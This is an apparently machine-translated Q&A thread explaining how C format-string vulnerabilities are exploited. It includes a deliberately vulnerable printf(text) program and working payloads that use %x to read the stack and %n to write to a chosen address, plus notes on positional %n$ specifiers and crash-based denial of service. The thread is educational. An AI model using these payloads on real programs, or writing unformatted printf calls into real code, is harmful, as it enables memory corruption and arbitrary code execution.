How can the Format-String vulnerability be exploited?

I read about code vulnerabilities and came across this Format-String vulnerability.

Wikipedia says:

Line formatting errors most often occur when a programmer wants to print a line containing data provided by the user. The programmer may mistakenly write printf (buffer) instead of printf ("% s", buffer). the first version interprets the buffer as a format string and parses any that may contain formatting instructions. The second version simply prints a line on the screen, as the programmer intended.

I had a problem with the printf (buffer) version, but I still do not understand how this vulnerability could be used by an attacker to execute malicious code. Can someone please tell me how this vulnerability can be exploited by example?

+59
c security
Sep 18 '11 at 5:17
source share
7 answers

You can exploit format string vulnerabilities in many ways, directly or indirectly. As an example, use the example below (provided that there are no relevant OS protections, which is very rare):

int main(int argc, char **argv) { char text[1024]; static int some_value = -72; strcpy(text, argv[1]); /* ignore the buffer overflow here */ printf("This is how you print correctly:\n"); printf("%s", text); printf("This is how not to print:\n"); printf(text); printf("some_value @ 0x%08x = %d [0x%08x]", &some_value, some_value, some_value); return(0); } 

The basis of this vulnerability is the behavior of functions with variable arguments. A function that implements the processing of a variable number of parameters should, in fact, read them from the stack. If we specify a format string that makes printf() wait for two integers on the stack, and we provide only one parameter, the second should be something else on the stack. By extension, and if we have control over the format string, we can have two basic elementary primitives:




Read from arbitrary memory addresses

[EDIT] IMPORTANT: I make some assumptions about the layout of the stack frame here. You can ignore them if you understand the basic premise of the vulnerability, and in any case, they differ between OS, platform, program, and configuration.

You can use the %s format parameter to read data. You can read the data of the original format string in printf(text) , so you can use it to read something from the stack:

 ./vulnerable AAAA%08x.%08x.%08x.%08x This is how you print correctly: AAAA%08x.%08x.%08x.%08x This is how not to print: AAAA.XXXXXXXX.XXXXXXXX.XXXXXXXX.41414141 some_value @ 0x08049794 = -72 [0xffffffb8] 



Writing to arbitrary memory addresses

You can use the %n format specifier to write to an arbitrary address (almost). Again, suppose our vulnerable program is higher, and try changing the value of some_value , which is located at 0x08049794 , as shown above:

 ./vulnerable $(printf "\x94\x97\x04\x08")%08x.%08x.%08x.%n This is how you print correctly: ??%08x.%08x.%08x.%n This is how not to print: ??XXXXXXXX.XXXXXXXX.XXXXXXXX. some_value @ 0x08049794 = 31 [0x0000001f] 

We have rewritten some_value with the number of bytes written before the %n specifier ( man printf ). We can use the format string or field width to control this value:

 ./vulnerable $(printf "\x94\x97\x04\x08")%x%x%x%n This is how you print correctly: ??%x%x%x%n This is how not to print: ??XXXXXXXXXXXXXXXXXXXXXXXX some_value @ 0x08049794 = 21 [0x00000015] 

There are many opportunities and tricks to try (direct access to parameters, a large field width that allows wrapping, creating your own primitives), and this just applies to the tip of the iceberg. I would advise reading more articles on fmt string vulnerabilities (Phrack has some mostly excellent ones, although they can be a bit advanced) or a book that touches on the topic.




Disclaimer: examples are taken [though not verbatim) from the book Hacking: The Art of Exploitation (2nd ed.) By John Erickson.

+88
Sep 18 2018-11-11T00:
source share

Interestingly, no one mentioned the n$ notation supported by POSIX. If you can manage the format string as an attacker, you can use notation such as:

 "%200$p" 

to read an element of 200 th on the stack (if any). It is assumed that you must list all the numbers n$ from 1 to the maximum and provide a way to reorder how the parameters are displayed in the format string, which is convenient when working with I18N (L10N, G11N, M18N * ).

However, some (perhaps most) systems are somewhat dissatisfied with how they confirm the n$ values, and this can lead to abuse by intruders who can control the format string. In combination with the %n format specifier, this can lead to writing at the places of the pointers.




* The abbreviations I18N, L10N, G11N and M18N are intended for internationalization, localization, globalization and multinationalization, respectively. The number represents the number of missing letters.

+11
Sep 19 '11 at 5:12
source share

Ah, the answer is in the article!

An uncontrolled format string is a type of software vulnerability discovered around 1999 that could be used for security purposes. It used to be that harmless format string exploits could be used to crash a program or execute malicious code .

A typical exploit uses a combination of these methods to force a program to rewrite the address of a library function or the return address on the stack with a pointer to some malicious shell code. The padding parameters for formatting qualifiers are used to control the number of output bytes, and the %x token is used to send bytes from the stack until the beginning of the format string itself is reached. The beginning of the format string is created in such a way as to contain an address in which the format tag %n can then be rewritten with the address of the malicious code to execute .

This is because %n forces printf write data to a variable that is on the stack. But this means that he could write something arbitrarily. All you need is for someone to use this variable (it’s relatively easy if it is a pointer to a function whose value you just defined how to control), and they can make you do anything arbitrarily.

Take a look at the links in this article; they look interesting .

+9
Sep 18 2018-11-11T00:
source share

I would recommend reading this lecture note about format string vulnerabilities. It details what is happening and how, and has some images that can help you understand this topic.

+2
Mar 31 '13 at 9:14
source share

AFAIK is mainly because it can crash your program, which is considered a denial of service attack. All you need to do is specify the wrong address (practically it is guaranteed to work with several %s ), and this will become a simple denial of service (DoS) attack.

Now it is theoretically possible that this might cause something in the case of an exception / signal / interrupt handler, but figuring out how to do this is beyond me - you need to figure out how to write arbitrary data into memory as well.

But why does anyone care if the program crashes, you ask? Isn’t it just inconvenient for the user (who deserves it anyway)?

The problem is that some programs get access to several users, so their failure is of negligible cost. Or sometimes they are critical to the operation of the system (or maybe they are doing something very critical in the middle), in which case it can damage your data. Of course, if you crash Notepad, then no one will worry, but if you run into CSRSS (in my opinion, there really was a similar error), in particular, the problem with a double error), then yes, the whole system goes down with you.




Update:

See this link for the CSRSS error that I was referring to.




Edit:

Please note that reading arbitrary data can be as dangerous as executing arbitrary code! If you read the password, cookie, etc., then it is as serious as executing arbitrary code - and this is trivial if you have enough time to try enough format lines.

0
Sep 18 2018-11-11T00:
source share

A simple do-it-yourself example: (I know that it works on winxp-win7, I don’t know about win8) open a command prompt in windows

 C:\>sort idontexists idontexistsThe system cannot find the file specified. C:\>sort idontexists%s idontexists"The system cannot find the file specified. C:\>sort idontexists%s idontexists,The system cannot find the file specified. C:\>sort idontexists%s idontexistsóThe system cannot find the file specified. C:\>sort idontexists%s idontexists!The system cannot find the file specified. C:\>sort idontexists%s idontexistsºThe system cannot find the file specified. 

When the file is not found, the program echoes the first argument and it replaces% s with some value from the stack ...

-2
May 6 '13 at 17:55
source share

The explanation . Remember that any varargs function in c needs to know how many parameters it receives. In printf, this is done by parsing the 1st parameter. If you change the first parameter so that printf thinks it has additional arguments, more things will exit the stack. (The wikipedia link should cover this in more detail).

-four
Sep 18 '11 at 5:28 a.m.
source share



All Articles